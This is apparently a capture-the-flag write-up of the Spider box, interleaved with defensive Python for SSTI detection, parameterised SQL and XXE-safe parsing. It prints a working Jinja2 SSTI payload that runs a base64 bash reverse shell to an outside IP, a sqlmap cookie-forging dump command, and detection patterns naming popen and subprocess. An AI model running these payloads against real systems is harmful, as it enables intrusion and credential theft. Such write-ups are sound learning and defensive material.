Enumeration
Discovered open port 80/tcp on 10.10.10.243
Discovered open port 22/tcp on 10.10.10.243
SSH typically isn’t an initial attack vector without credentials, so I started by enumerating HTTP.
There’s a furniture store selling different chairs. The admin portal can be seen on the left, along with login and register. We can’t access the admin portal, and the login form wants a UUID rather than a username (so common credentials won’t work). I registered an account and used the UUID it gave me to log in.
We still can’t reach the admin page or the admin portal. I tried testing the checkout and looking at the requests for the different features (checking out, adding to cart, etc.) and couldn’t find anything, so I went back to the register page to see if I could perform any attacks there.
After a while I managed to perform SSTI by registering an account called {{7*7}}. The username is rendered as a template, and the evaluated result shows up in the user information section.
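The registration form above renders whatever username it is given as a template, which is why a {{7*7}} probe gets evaluated. From the defending side, the real fix is to never pass user input into the template source (render a fixed template and hand the username in as a variable), but it is also worth catching probes like this at the input layer and in logs. The following is an added example, not code from the writeup or from the box: a small classifier for registration usernames that flags complete Jinja2/Twig tags and dunder access, and that first decodes the \x5f-style escapes the later payload on this page uses to hide the double underscores. The sample usernames are constructed test inputs.

```python
import re

# Constructed sample registration usernames: ordinary names next to the probe and
# payload shapes this writeup describes. These are test inputs, not captured traffic.
SAMPLE_USERNAMES = [
    "alice",
    "{{7*7}}",
    "{{config}}",
    r'{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"] %} a {% endwith %}',
    "bob_smith",
    "user{{",  # an unclosed delimiter: odd, but not a complete template tag
]

# Jinja2/Twig delimiters (expressions, statements, comments) plus ${...} used by
# other engines. Non-greedy so several tags on one line are found separately.
TAG_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}|\$\{.*?\}", re.S)
# Dunder attributes are how a template reaches globals/builtins.
DUNDER_RE = re.compile(r"__\w+__")
# Hex and unicode escapes for '_' let a payload slip past a naive '__' filter.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
# Names that almost never belong in a username but appear in template payloads.
SENSITIVE_NAMES = ("config", "request", "globals", "builtins", "import",
                   "popen", "subprocess", "system")


def normalise(value: str) -> str:
    """Decode \\xHH and \\uHHHH escapes so obfuscated dunders become visible."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), value)


def classify(value: str) -> dict:
    """Describe why a submitted value looks like a template injection attempt."""
    text = normalise(value)
    return {
        "template_syntax": bool(TAG_RE.search(text)),
        "dunder": bool(DUNDER_RE.search(text)),
        "sensitive_names": [n for n in SENSITIVE_NAMES if n in text],
    }


def is_suspicious(value: str) -> bool:
    """Flag on complete template tags or dunder access; names alone only add context."""
    verdict = classify(value)
    return verdict["template_syntax"] or verdict["dunder"]


def scan(values) -> list:
    """Return the inputs that should be rejected at registration (or alerted on in logs)."""
    return [v for v in values if is_suspicious(v)]


if __name__ == "__main__":
    for name in SAMPLE_USERNAMES:
        print(f"{name!r:80} -> {classify(name)}")
```

The escape decoding matters more than the tag regex: a filter that only looks for literal `__` is exactly what the `\x5f\x5f` spelling later in this writeup is designed to get past. Rejecting at registration is the cheap win; the same `classify` output also makes a reasonable alert field when run over web access logs.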
Foothold
Since {{7*7}} worked, we can assume the engine is either Jinja2 or Twig. Registering with a username of {{config}} dumps the application config, which contains the Flask secret key. Taking this over to sqlmap, we can use the --eval argument to have sqlmap re-sign the Flask session cookie on every request with flask-unsign, so the injection goes through the uuid inside the session token:
sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='<SECRET_KEY from the dumped config>')" --cookie="session=*" --delay 3 --dump
This can be temperamental, so play around with the delay. You can just let it run, selecting yes on the first prompt and no for the rest. We get the following from sqlmap:
+----+--------------------------------------+------+-----------------+
| id | uuid                                 | name | password        |
+----+--------------------------------------+------+-----------------+
| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | REDACTED        |
| 2  | efaff2ec-3fd1-4cc0-b23d-425b1efb8fdf | abcd | abcd            |
| 3  | 86772b26-07b4-4e57-82ae-a37a896b92e9 | oops | oops            |
+----+--------------------------------------+------+-----------------+
Chiv’s account looks interesting; we can sign in with his credentials at the login portal.
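The dump above works because the uuid pulled out of the session cookie is spliced straight into a SQL statement, so once the cookie can be re-signed, the query can be rewritten. This is an added example, not the box’s application code or anything from the writeup: a SQLite table with the same columns as the dump (constructed rows, not the real ones), the lookup written the vulnerable way next to a bound-parameter version, and a further check that the value is a well-formed UUID before it reaches the database at all.

```python
import sqlite3
import uuid as uuidlib


def make_db() -> sqlite3.Connection:
    """In-memory table with the columns sqlmap dumped; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, uuid TEXT, name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (uuid, name, password) VALUES (?, ?, ?)",
        [
            ("11111111-1111-4111-8111-111111111111", "alice", "<password hash>"),
            ("22222222-2222-4222-8222-222222222222", "bob", "<password hash>"),
        ],
    )
    return conn


def lookup_vulnerable(conn, session_uuid: str) -> list:
    """'Before' case: the cookie value is spliced into the SQL text, so anyone who
    can re-sign the session cookie can rewrite the query. Kept only for contrast."""
    query = f"SELECT name FROM users WHERE uuid = '{session_uuid}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, session_uuid: str) -> list:
    """Bound parameter: the value is data and can never change the statement."""
    query = "SELECT name FROM users WHERE uuid = ?"
    return [row[0] for row in conn.execute(query, (session_uuid,))]


def is_well_formed(session_uuid: str) -> bool:
    """True only for a syntactically valid UUID (hyphenated or not)."""
    try:
        uuidlib.UUID(session_uuid)
    except (ValueError, AttributeError, TypeError):
        return False
    return True


def lookup_validated(conn, session_uuid: str) -> list:
    """Defence in depth: reject anything that is not a UUID before it reaches the
    database, then look up the canonical hyphenated form with a bound parameter."""
    if not is_well_formed(session_uuid):
        raise ValueError("session uuid is malformed")
    return lookup_safe(conn, str(uuidlib.UUID(session_uuid)))


# Constructed tampered value of the kind that would be placed in a forged cookie.
TAMPERED = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, TAMPERED))  # every user's name
    print("safe:      ", lookup_safe(db, TAMPERED))        # nothing
    print("well-formed:", is_well_formed(TAMPERED))        # False
```

Two other things the dump shows are worth acting on even with the injection fixed: the password column holds plaintext (abcd/abcd, oops/oops), and the secret key that makes the cookie forgeable came out of `{{config}}`. Hashing the passwords limits the damage of a dump, and rotating the Flask secret key invalidates every session signed with the leaked one.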
User own
We’re given a few options: we’re able to look at messages and view support tickets. Looking at the messages, we can see there’s a message about an unfinished support portal.
We can probably use SSTI again, this time to get a reverse shell. There’s a list of payloads available here.
The payload I’m using is {% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xODAvNDQ0NCAwPiYx | base64 -d | bash")["read"]() %} a {% endwith %}
The base64 section is a simple bash TCP reverse shell; decode it and re-encode it with your own IP and port.
We can catch the connection with netcat and execute commands. The user flag is in Chiv’s home directory (/home/chiv/user.txt) and his SSH key is in .ssh (/home/chiv/.ssh/id_rsa). Luckily the key isn’t passphrase-protected, so we can copy it and use it.
Root own
Since we now have chiv, we can work on rooting the box. As always, we can use linpeas to enumerate possible privilege escalation vectors. There are some rabbit holes, but after some searching we can see there are a couple of ports listening that we didn’t previously have access to, since they are bound to localhost.
Port 3306 makes sense since we were using SQL earlier; port 8080 seems interesting. We can reach it through an SSH tunnel:
ssh -i chividrsa -L 8080:127.0.0.1:8080 chiv@spider.htb
(You may want to use a different local port, since 8080 is used by BurpSuite by default.)
We can then access the website at http://127.0.0.1:8080/
We’re able to log in using any username.
There’s not a great deal here; it just looks like a similar page. After looking around, I decided to look into the cookie. We can use flask-unsign to decode it and have a look:
It’s not very pretty, but the important part is the lxml section: we can base64-decode that and have a look at the payload:
The version is also reflected in the source code of the login page:
We’ll use BurpSuite to inject an XXE payload.
This gives us root’s SSH key. We probably could just read root.txt from /root/root.txt, but for the sake of being proper we’ll take the SSH key and log in using it. The key may appear distorted in the rendered page, but if you use view-source you can copy and paste it cleanly.
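The root step works because the support portal base64-decodes XML out of a client-controlled cookie and hands it to lxml with entity resolution left on, so a DOCTYPE in the cookie can pull a file into the response. The following is an added example, not the portal’s code or anything from the writeup: a parser for cookie-carried XML that refuses any DOCTYPE or ENTITY declaration before a parser ever sees the bytes, then parses with the standard library. The cookie values, the field names and the "file:///placeholder" target in the hostile sample are all constructed for the demonstration.

```python
import base64
import re
import xml.etree.ElementTree as ET

# A DOCTYPE is the only place entities can be declared, so a client-supplied
# document has no legitimate reason to carry one. Rejecting it outright covers
# external entities, parameter entities and entity-expansion bombs alike.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when client XML carries a DTD."""


def decode_cookie_xml(b64_value: str) -> bytes:
    """Base64-decode the XML carried in the cookie; strict alphabet, no junk tolerated."""
    return base64.b64decode(b64_value, validate=True)


def parse_untrusted_xml(raw: bytes) -> ET.Element:
    """Parse XML from an untrusted source with any DTD rejected up front."""
    if DTD_RE.search(raw):
        raise UnsafeXMLError("DOCTYPE/ENTITY declarations are not accepted from clients")
    return ET.fromstring(raw)


def session_fields(b64_value: str) -> dict:
    """Extract the fields the application cares about (assumed names) from the cookie's XML."""
    root = parse_untrusted_xml(decode_cookie_xml(b64_value))
    return {
        "username": root.findtext("username"),
        "version": root.findtext("version"),
    }


def is_accepted(b64_value: str) -> bool:
    """True if the cookie's XML decodes and parses under the DTD ban."""
    try:
        session_fields(b64_value)
        return True
    except (UnsafeXMLError, ET.ParseError, ValueError):
        # binascii.Error from a bad base64 string is a ValueError subclass.
        return False


# Constructed cookies: a benign one and one carrying an external entity declaration.
BENIGN_XML = b"<root><username>alice</username><version>1.0.0</version></root>"
HOSTILE_XML = (
    b'<!DOCTYPE root [<!ENTITY ext SYSTEM "file:///placeholder">]>'
    b"<root><username>&ext;</username><version>1.0.0</version></root>"
)
BENIGN_COOKIE = base64.b64encode(BENIGN_XML).decode()
HOSTILE_COOKIE = base64.b64encode(HOSTILE_XML).decode()

if __name__ == "__main__":
    print("benign :", session_fields(BENIGN_COOKIE))
    print("hostile:", "accepted" if is_accepted(HOSTILE_COOKIE) else "rejected")
```

If the application has to stay on lxml, the equivalent is constructing the parser with resolve_entities=False (and no_network=True), or wrapping the parse with defusedxml; the pre-check above is independent of the parser and is the cheapest thing to bolt on in front of a cookie handler like this one. The deeper point from this box is that a signed cookie only proves the server issued it, not that its contents are safe to parse, and here the signing key had already leaked through {{config}}.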